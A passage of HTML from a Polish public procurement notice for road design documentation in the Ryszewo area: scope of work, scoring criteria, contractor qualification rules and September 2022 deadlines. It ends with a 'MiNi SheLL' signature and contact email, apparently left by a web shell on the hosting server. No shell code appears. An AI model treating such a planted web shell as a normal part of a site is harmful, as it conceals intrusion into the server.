na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Cena - najniższa cena brutto - 60 pkt. 2. Doświadczenie osób wyznaczonych do realizacji<br/>zamówienia ( doświadczenie projektanta w specjalności drogowej) – 40 pkt.<br/>Liczba zrealizowanych projektów dotyczących przedsięwzięć związanych z budową lub przebudową lub remontem drogi/dróg:<br/>• 1 projekt – 0 pkt.<br/>• 2 projekty – 20 pkt.<br/>• 3 i więcej projektów – 40 pkt.<br/>Informację należy wskazać w załączniku 1a do SWZ podając imię i nazwisko projektanta, nazwę, datę zakończenia inwestycji oraz<br/>podmiot na rzecz, którego inwestycja została zrealizowana.<br/>Niezłożenie wskazanego załącznika, bądź niewskazanie którejkolwiek z wymaganych wyżej informacji będzie skutkowało<br/>nieprzyznaniem punktów w niniejszym kryterium oceny ofert .</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 3<br/><br/>Przebudowa drogi w m. Ryszewo na działce nr 104 i 142 obr. Ryszewo wraz z infrastrukturą drogową: I etap - Opracowanie dokumentacji projektowo-kosztorysowej.<br/><br/>Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo – kosztorysowej niezbędnej do uzyskania wymaganych prawem pozwoleń/zgłoszeń oraz sprawowanie nadzoru autorskiego w trakcie trwania robót budowlanych. Zakładane długości drogi: dz. nr 104 - długość ok. 100 mb, dz. nr 142 – długość ok 150 mb.<br/>1) W zakres opracowania wchodzi:<br/>a)	Mapa do celów projektowych wraz mapami podziału <br/>b) Projekt budowlany wielobranżowy branż: drogowej, sanitarnej, elektrycznej wraz z rozwiązaniem wszelkich kolizji z infrastrukturą techniczną – po 6 egz.<br/>c) Projekt wykonawczy wielobranżowy branż: drogowej, sanitarnej, elektrycznej wraz z rozwiązaniem wszelkich kolizji z infrastrukturą techniczną – po 6 egz.<br/>d) Projekt budowy kanału technologicznego (w przypadku konieczności) – po 6 egz.<br/>e) Projekt budowy oświetlenia ulicznego na powietrznego oraz kablowego na oprawach ledowych – po 6 egz.<br/>f) uzyskanie warunków przyłączenia do sieci elektroenergetycznej ( w miarę potrzeb);<br/>g) wykonanie dokumentacji wraz kosztorysem inwestorskim usunięcia kolizji projektowanego<br/>oświetlenia z infrastrukturą uzbrojenia terenu w przypadku ich wystąpienia, zgodnie z<br/>obowiązującymi przepisami – po 6 egz.<br/>h) Projekt zagospodarowania zieleni wraz z wycinką drzew (wraz z uzyskaniem decyzji w przypadku konieczności) – po 6 egz.<br/>i) Projekt nasadzeń (w przypadku konieczności) – po 6 egz.<br/>j) Projekt stałej organizacji ruchu – 6 egz.<br/>k) Przedmiar robót – 2 egz. dla każdej z branż<br/>l) Kosztorys inwestorski – 2 egz. dla każdej z branż<br/>ł) Kosztorys ofertowy – 2 egz. dla każdej z branż<br/>m) Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych – 2 egz. dla każdej z branż<br/>n) Badania geologiczne gruntu – 2 egz.<br/>o) Pomiary natężenia ruchu – 2 egz.<br/>p) warunki techniczne, wymagane opinie, uzgodnienia właściwych organów, pozwolenia wodno-prawne, i inne niezbędne do uzyskania ostatecznej decyzji administracyjnej, uprawniającej Zamawiającego do rozpoczęcia robót budowlanych,<br/><br/>2) Do Wykonawcy należy:<br/>a)	Uzyskanie wypisu i wyrysu z miejscowego planu zagospodarowania przestrzennego a jeżeli plan nie został uchwalony to uzyskanie decyzji o lokalizacji inwestycji celu publicznego – jeśli będę wymagane.<br/>b)	Uzyskanie niezbędnych badań gruntowych i sporządzenie dokumentacji geotechnicznej – jeśli wystąpi taka konieczność.<br/>c)	uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) dla inwestycji – jeśli wystąpi taka konieczność<br/>d)	Uzyskanie innych wymaganych przepisami zgód, opinii, decyzji, pozwoleń, itp. <br/>e)	Pozyskanie mapy do celów projektowych dla całego zamierzenia inwestycyjnego; <br/>f)	uzyskanie w imieniu Zamawiającego wszelkich warunków niezbędnych w procesie projektowania;<br/>g)	sporządzenie projektów budowlanych i uzyskanie dla nich wynikających z przepisów: opinii, zgód, uzgodnień i pozwoleń łącznie z pozwoleniem na budowę lub zgłoszenie robót nie wymagające pozwolenia na budowę, <br/>h)	sporządzenie projektów wykonawczych branżowych i specyfikacji technicznych wykonania i odbioru robót dla wszystkich występujących branż, <br/>i)	sporządzenie kosztorysów inwestorskich i przedmiarów robót sporządzonych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004r. nr 130 poz. 1389). <br/>j)	Wykonawca zobowiązany jest do przedstawiania i uzgadniania z Zamawiającym proponowanych rozwiązań projektowych. Projekt powinien zostać zaakceptowany i odebrany przez Zamawiającego. <br/>k) Dokumentację projektową należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna ona być opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć. Informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych. <br/>l)	Zaleca się przeprowadzenie wizji lokalnej w terenie, gdzie mają być wykonywane roboty. Wizję lokalną Wykonawca dokonuje na swój koszt. <br/>m)	Wykonawca w ramach niniejszego zamówienia poniesie wszelkie koszty niezbędne do wykonania dokumentacji projektowej i uzyskania niezbędnych pozwoleń ( Enea; Starostwo Powiatowe) . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Cena - najniższa cena brutto - 60 pkt. 2. Doświadczenie osób wyznaczonych do realizacji<br/>zamówienia ( doświadczenie projektanta w specjalności drogowej) – 40 pkt.<br/>Liczba zrealizowanych projektów dotyczących przedsięwzięć związanych z budową lub przebudową lub remontem drogi/dróg:<br/>• 1 projekt – 0 pkt.<br/>• 2 projekty – 20 pkt.<br/>• 3 i więcej projektów – 40 pkt.<br/>Informację należy wskazać w załączniku 1a do SWZ podając imię i nazwisko projektanta, nazwę, datę zakończenia inwestycji oraz<br/>podmiot na rzecz, którego inwestycja została zrealizowana.<br/>Niezłożenie wskazanego załącznika, bądź niewskazanie którejkolwiek z wymaganych wyżej informacji będzie skutkowało<br/>nieprzyznaniem punktów w niniejszym kryterium oceny ofert .</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany<br/>jest wykazać.<br/>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu.<br/>2) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej.<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany<br/>jest wykazać.<br/>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu.<br/>3) Sytuacja ekonomiczna lub finansowa.<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania warunku udziału w postępowaniu w odniesieniu do<br/>warunku dotyczącego sytuacji finansowej.<br/>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana w oparciu o oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu.<br/>4) Zdolności techniczne lub zawodowe.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający szczegółowe warunki<br/>udziału w postępowaniu, tj.:<br/>a) Wykonawcy ubiegający się o udzielenie zamówienia publicznego muszą wykazać, że wykonali w okresie ostatnich trzech<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:<br/>- jedną usługę polegającą na wykonaniu kompleksowej dokumentacji projektowokosztorysowej<br/>dotyczącej budowy lub przebudowy lub remontu drogi, na podstawie której<br/>uzyskano prawomocne pozwolenie na budowę lub zgłoszenie robót budowlanych<br/>niewymagających pozwolenia na budowę o wartości minimum: 40 000 zł brutto.<br/>- jedną usługę polegającą na wykonaniu kompleksowej dokumentacji projektowokosztorysowej<br/>dotyczącej budowy lub przebudowy lub modernizacji oświetlenia drogowego lub ulicznego, na podstawie<br/>której uzyskano prawomocne pozwolenie na budowę lub zgłoszenie robót budowlanych niewymagających pozwolenia na<br/>budowę o wartości minimum: 5 000 zł brutto.<br/>W przypadku składania oferty na więcej niż jedno zadanie wystarczające jest, że Wykonawca wykaże spełnienie warunku w<br/>zakresie zdolności technicznych lub zawodowych jednokrotnie.<br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego, w oparciu o informacje<br/>zawarte w:<br/>- oświadczeniu o spełnianiu warunków udziału w postępowaniu,<br/>- w wykazie wykonanych prac projektowych oraz w dowodach określających czy te prace projektowe zostały wykonane<br/>należycie, w szczególności zgodnie z przepisami prawa i prawidłowo ukończone.<br/>b) Wykonawca ubiegający się o udzielenie zamówienia publicznego musi wykazać, że w wykonywaniu zamówienia<br/>uczestniczyć będą:<br/>- Projektant w specjalności drogowej – posiadający uprawnienia budowlane uprawniające do projektowania oraz<br/>posiadający doświadczenie przy wykonaniu minimum 1 dokumentacji projektowej dla przedsięwzięcia związanego z budową<br/>lub przebudową lub remontem drogi/dróg.<br/>- Projektantem w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych -<br/>posiadający uprawnienia budowlane uprawniające do projektowania oraz posiadający doświadczenie przy wykonaniu<br/>minimum 1 dokumentacji projektowej dla przedsięwzięcia związanego z budową lub przebudową lub modernizacją<br/>oświetlenia drogowego lub ulicznego.<br/>Przez uprawnienia do pełnienia samodzielnych funkcji w budownictwie Zamawiający rozumie uprawnienia wydane na<br/>podstawie aktualnie obowiązującej ustawy – Prawo budowlane (tj. j. Dz.U. z 2021 r. poz. 2351 z późn. zm.) lub<br/>odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów albo odpowiednie<br/>kwalifikacje uzyskane za granicą a uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>Wykonawca złoży oświadczenie na temat wykształcenia i kwalifikacji zawodowych Wykonawcy lub kadry kierowniczej<br/>Wykonawcy (projektanta ).<br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego w oparciu o informacje<br/>zawarte w<br/>- oświadczeniu o spełnianiu warunków udziału w postępowaniu,<br/>- wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia,<br/>- oświadczeniu, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o<br/>przynależności albo braku przynależności do tej samej grupy kapitałowej -załącznik nr 4<br/>2)Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia,Dokumenty powinny być wystawione nie wcześniej<br/>niż 6 miesięcy przed upływem terminu składania ofert.a)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca<br/>ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.b)Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie<br/>wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie<br/>wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał<br/>dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub<br/>gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej<br/>osoby.Dokumenty/oświadczenia powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert.3) Wykaz<br/>wykonanych robót projektowych oraz w dowody określające czy te roboty projektowe zostały wykonane należycie, w szczególności<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.(załącznik nr 3A do SWZ)<br/>Dowodami są poświadczenia (referencje) bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów -<br/>inne dokumenty.<br/>W przypadku, gdy Wykonawca składa inne dokumenty niż poświadczenia (referencje), zobowiązany jest podać przyczyny braku<br/>możliwości uzyskania referencji.<br/>W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej<br/>wykonane, Wykonawca nie ma obowiązku przedkładania dowodów o ich należytym wykonaniu.4) Wykonawca ubiegający się o<br/>udzielenie zamówienia publicznego musi wykazać, że w wykonywaniu zamówienia uczestniczyć będzie osoba posiadająca<br/>uprawnienia niezbędne do wykonania przedmiotu zamówienia, ze wskazaniem zakresu wykonywanych czynności oraz informacją o<br/>podstawie dysponowania tą osobą, a mianowicie:<br/>- jedna osoba - Projektant w specjalności drogowej – posiadający uprawnienia budowlane uprawniające do projektowania<br/>przedsięwzięcia związanego z budową lub przebudową lub remontem drogi/dróg , zgodnie z załącznikiem 3B do SWZ.<br/>- jedna osoba - Projektant w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych -<br/>posiadający uprawnienia budowlane uprawniające do projektowania przedsięwzięcia związanego z budową lub przebudową lub<br/>modernizacją oświetlenia drogowego lub ulicznego5) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że Wykonawca nie<br/>zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem<br/>terminu składania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie<br/>spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,<br/>odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający w niniejszym postępowaniu wymaga, aby wykonawcy wykazując brak podstaw do wykluczenia złożyli wymagane<br/>oświadczenia / dokumenty do oferty. Na<br/>podstawie art. 125 ust. 1ustawy Pzp w terminie składania ofert każdy z wykonawców składa oświadczenia o braku podstaw do<br/>wykluczenia z postępowania – Załącznik numer 2 do SWZ<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia z postępowania</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący załącznik nr 5 do SWZ. Umowa zostanie zawarta<br/>na podstawie złożonej oferty Wykonawcy.<br/>2.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie, której<br/>dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z<br/>uwzględnieniem podawanych warunków ich wprowadzenia:<br/>1) zmiana wskazanej w ofercie osoby, możliwa jest jedynie na osobę o kwalifikacjach i doświadczeniu tożsamym lub<br/>lepszym, zmiana osoby może nastąpić wyłącznie za zgodą Zamawiającego i w okolicznościach, na które Wykonawca nie<br/>miał wpływu, takich jak:<br/>− choroba osoby wskazanej do realizacji zamówienia,<br/>− ustanie stosunku pracy lub rozwiązanie umowy cywilnoprawnej z osobą wskazaną do realizacji zamówienia z przyczyn<br/>zależnych od pracownika.<br/>2) Zmiana terminu przewidzianego na zakończenie usług, tj.:<br/>a) działania siły wyższej (np. klęski żywiołowe, strajki generalne, lub lokalne, epidemie oraz inne uwarunkowania niezależne<br/>od Wykonawcy), mającej bezpośredni wpływ na terminowość wykonania usługi;<br/>b) przestojów i opóźnień zawinionych przez Zamawiającego;<br/>c) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;<br/>d) wydłużenie o czas powstały w wyniku nie zawarcia umowy od czasu możliwego do zawarcia o czas zwłoki związany z<br/>wniesionym odwołaniem lub okolicznościami prowadzonych wyjaśnień wnoszonych zastrzeżeń przez wykonawców lub<br/>osoby postronne do prowadzonego postępowania oraz w pozostałych przypadkach od zakończenia pierwszego terminu<br/>związania ofertą;<br/>3.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią<br/>jednocześnie zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy zożyć za pośrednictwem formularza na Platformie na stronie postępowania znajdującej się pod adresem wskazanym na stronie internetowej https://platformazakupowa.pl/pn/um_pyrzyce/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com